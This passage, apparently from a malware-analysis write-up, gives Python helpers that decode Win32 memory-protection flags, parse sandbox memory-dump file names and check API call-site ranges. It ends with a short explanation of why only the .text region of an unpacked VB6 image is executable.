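def refs_in_range(refs: List[ApiRef], lo: int, hi: int) -> bool:
    """True when every call site lies inside [lo, hi], e.g. the listed function."""
    return all(lo <= r.ref <= hi for r in refs)


# Win32 memory protection constants (winnt.h). Low byte is the base protection,
# the higher bits are modifiers that can be OR-ed onto it.
PAGE_BASE = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_FLAGS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}


def decode_protection(value: int) -> str:
    base = value & 0xFF
    names = [PAGE_BASE.get(base, f"0x{base:02x}")]
    names += [n for bit, n in sorted(PAGE_FLAGS.items()) if value & bit]
    return "|".join(names)


@dataclass
class DumpSource:
    process_index: int
    dump_index: int
    sequence: str
    base: int
    protection: int
    region_type: int

    @property
    def executable(self) -> bool:
        # Any of PAGE_EXECUTE* (0x10, 0x20, 0x40, 0x80) set in the base byte.
        return bool(self.protection & 0xF0)


def parse_dump_name(name: str) -> DumpSource:
    # Assumed field order, inferred from the sample names (not documented here):
    # <process>.<dump>.<sequence>.<base address>.<protection>.<region type>.sdmp
    parts = name.split(".")
    if len(parts) != 7 or parts[-1] != "sdmp":
        raise ValueError(f"unexpected dump name layout: {name!r}")
    proc, dump, seq, base, prot, rtype, _ = parts
    return DumpSource(int(proc), int(dump), seq, int(base, 16), int(prot, 16), int(rtype, 16))


def executable_dumps(dumps: List[DumpSource]) -> List[DumpSource]:
    return [d for d in dumps if d.executable]


if __name__ == "__main__":
    refs = parse_api_lines(API_LINES)
    print("all call sites inside 0x40ed98..0x40ee0f:", refs_in_range(refs, 0x40ED98, 0x40EE0F))
    for r in refs:
        print(f"{r.ref:08x} {r.module}!{r.name} known args: {[hex(a) for a in r.known_args]}")
    for d in map(parse_dump_name, DUMP_NAMES):
        print(f"{d.base:#010x} {decode_protection(d.protection)} executable={d.executable}")
```

Only the dump at 0x401000 (the .text region the listing was taken from) carries an execute protection; the header at 0x400000 and the region at 0x411000 are read-only, and 0x410000 is read-write, which is the layout you would expect for an unpacked VB6 image and a quick sanity check that the decompiled code came from a mapped code section rather than a heap allocation.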